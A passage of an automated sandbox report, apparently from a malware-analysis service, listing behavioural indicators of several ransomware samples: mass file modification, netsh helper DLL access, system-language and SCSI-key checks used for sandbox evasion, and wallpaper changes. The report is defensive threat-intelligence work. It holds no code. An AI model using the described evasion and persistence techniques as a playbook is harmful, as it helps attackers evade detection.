HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_es-es_5d20853379777666\wizardPermission.ascx.es.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-a..c-performance-layer_31bf3856ad364e35_10.0.19041.1_none_6a0983a8860f5584\dmscript.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_it-it_0d9052e350483924\Tracking_Logic.sql HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_e494480974de1597\MSFT_GroupResource.schema.mfl HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-nat-powershell_31bf3856ad364e35_10.0.19041.1_none_8544c27699e18a0d\MSFT_NetNatStaticMapping.cdxml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_netfx-aspnet_webadmin_prov_res_b03f5f7f11d50a3a_10.0.19041.1_none_a2ba81c5abcec0d9\manageconsolidatedProviders.aspx.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.19041.1_zh-cn_7294ce476ec912f1\comctl32.dll.mui HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-smbserver-powershell_31bf3856ad364e35_10.0.19041.488_none_debd2e6a67bd337b\SmbServerNetworkInterface.cdxml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershell.pester_31bf3856ad364e35_10.0.19041.1_none_9478227a478f23d5\about_should.help.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.1_none_295bb689d5f0ebfa\powershell.exe.config HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-m..player-shellpreview_31bf3856ad364e35_10.0.19041.1266_none_3fb851095cc978d4\r\wmprph.exe HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_netfx4-aspnet_webadmin_wizard_res_b03f5f7f11d50a3a_4.0.15805.0_none_22b85720c37c52fb\wizardAddUser.ascx.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.19041.1_fi-fi_b1f4c56a7ce81cae\comctl32.dll.mui HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_de-de_b46452568a7278fc\home2.aspx.de.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_netfx4-globalserifcf_b03f5f7f11d50a3a_4.0.15805.0_none_28372ac2cfd16706\GlobalSerif.CompositeFont HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_de-de_b46452568a7278fc\navigationBar.ascx.de.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-wmiv2provider_31bf3856ad364e35_10.0.19041.1_none_dd43866469710c67\MSFT_NetTransportFilter.cdxml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.windows.powershell.v3.common_31bf3856ad364e35_10.0.19041.1_none_57d052f85763ab6b\developerManagedEnumeration.xsd HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.packagema..agesource.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_4755913689becd82\MSFT_PackageManagementSource.strings.psd1 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_6c1aa43db0003bcf\MSFT_EnvironmentResource.schema.mfl HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-l..-lpksetup.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_e6d709a245b459a8\lpeula.rtf HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_es-es_5d20853379777666\manageUsers.aspx.es.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_de-de_d7f4b3c0973f3fda\WebAdminHelp_Application.aspx.de.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.windowsau..nprotocols.commands_31bf3856ad364e35_10.0.19041.84_none_a2b3c63b6e011244\Microsoft.WindowsAuthenticationProtocols.Commands.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-s..nsentverifier-winrt_31bf3856ad364e35_10.0.19041.264_none_d3c1ab31b05d8c9c\f\Windows.Security.Credentials.UI.UserConsentVerifier.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-o..nefiles-extend-apis_31bf3856ad364e35_10.0.19041.1_none_4d38750d0809fde7\cscobj.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-n..tcapture-powershell_31bf3856ad364e35_10.0.19041.1_none_564dad239cbedf01\NetEventPacketCapture.Types.ps1xml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-i..mon-printexperience_31bf3856ad364e35_10.0.19041.746_none_7f8ee0379cb19113\r\Windows.Internal.ShellCommon.PrintExperience.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_cs-cz_659b8edb96b66240\comctl32.dll.mui HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-wwfcorecomp.resources_31bf3856ad364e35_10.0.19041.1_de-de_6c44f10919aaee05\Tracking_Schema.sql HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershell.dsc_31bf3856ad364e35_10.0.19041.1_none_a5de854f1c9a4cb0\Stop-DscConfiguration.cdxml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-peerdist-common_31bf3856ad364e35_10.0.19041.1151_none_dd2428acc5b9d2f7\BranchCacheSecondaryRepublicationCacheFile.cdxml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-netshell-mui.resources_31bf3856ad364e35_10.0.19041.1_es-es_0f0a8d580e605d1d\ncpa.cpl.mui HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-l..se-oem-professional_31bf3856ad364e35_10.0.19041.1288_none_82da9179703def48\r\license.rtf HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_windows-system-diag..formtelemetryclient_31bf3856ad364e35_10.0.19041.746_none_0663d0a203cde52d\f\Windows.System.Diagnostics.Telemetry.PlatformTelemetryClient.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_regsvcs_b03f5f7f11d50a3a_4.0.15805.0_none_8ce1f3b4679d3a76\regsvcs.exe.config HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-smbserver-powershell_31bf3856ad364e35_10.0.19041.488_none_debd2e6a67bd337b\SmbComponent.cdxml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_es-es_5d20853379777666\manageProviders.aspx.es.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.dtc.power..l.scripts.resources_31bf3856ad364e35_10.0.19041.1_es-es_a09788c8ce4abc1b\TestDtc.psd1 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-powercfg_31bf3856ad364e35_10.0.19041.1_none_1ded72a14aa7d349\powercfg.cpl HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-netadaptercim_31bf3856ad364e35_10.0.19041.1_none_396e016fc459e02d\MSFT_NetAdapterAdvancedProperty.Format.ps1xml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-netadaptercim_31bf3856ad364e35_10.0.19041.1_none_396e016fc459e02d\MSFT_NetAdapterEncapsulatedPacketTaskOffload.Format.ps1xml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-i..ctorybrowsebinaries_31bf3856ad364e35_10.0.19041.1_none_fb092007593bff0c\dirlist.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_netfx4-aspnet_webadmin_images_b03f5f7f11d50a3a_4.0.15805.0_none_7ab11546ceb3decd\topGradRepeat.jpg HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershell.dscresources_31bf3856ad364e35_10.0.19041.1_none_5ab46b9671589b69\MSFT_RegistryResource.schema.mof HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.19041.1_en-us_4211752681e50d90\MSFT_ScriptResource.schema.mfl HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.dtc.powershell.scripts_31bf3856ad364e35_10.0.19041.1_none_c197fa97b94cfe01\MsDtc.Types.ps1xml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-o..ct-picker.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_c99b8c8b56859548\objsel.dll.mui HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_it-it_0d9052e350483924\default.aspx.it.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.windows.powershell.v3.common_31bf3856ad364e35_10.0.19041.1_none_57d052f85763ab6b\Microsoft.PowerShell.Security.psd1 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.windows.powershell.common_31bf3856ad364e35_10.0.19041.1_none_f125082deef76556\Diagnostics.Format.ps1xml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_fr-fr_23685c9c791653a6\EditAppSetting.aspx.fr.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.19041.1202_none_497a4c9b969ee5eb\winrm.cmd HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-i..henticationbinaries_31bf3856ad364e35_10.0.19041.1_none_600fe2a6ef35d8c5\authbas.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_netfx35linq-system...del.dataannotations_31bf3856ad364e35_10.0.19041.1_none_6c8b447ee015b181\System.ComponentModel.DataAnnotations.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_windows-storage-compression-winrt_31bf3856ad364e35_10.0.19041.264_none_ca772936fdb08fc7\Windows.Storage.Compression.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_it-it_0d9052e350483924\DefineErrorPage.aspx.it.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_es-es_80b0e69d86443d44\DropSqlPersistenceProviderSchema.sql HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.19041.1_es-es_41dcd20a820bff35\MSFT_WaitForAll.schema.mfl HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exeTrojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exeHEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exereg.exeHEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exeTrojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exeTrojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.execmd.execsrss.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exeTrojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csrss.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exetaskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Modifies Control Panel 2 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\WallpaperStyle = "6" HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\TileWallpaper = "0" HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" csrss.exe Set value (str) 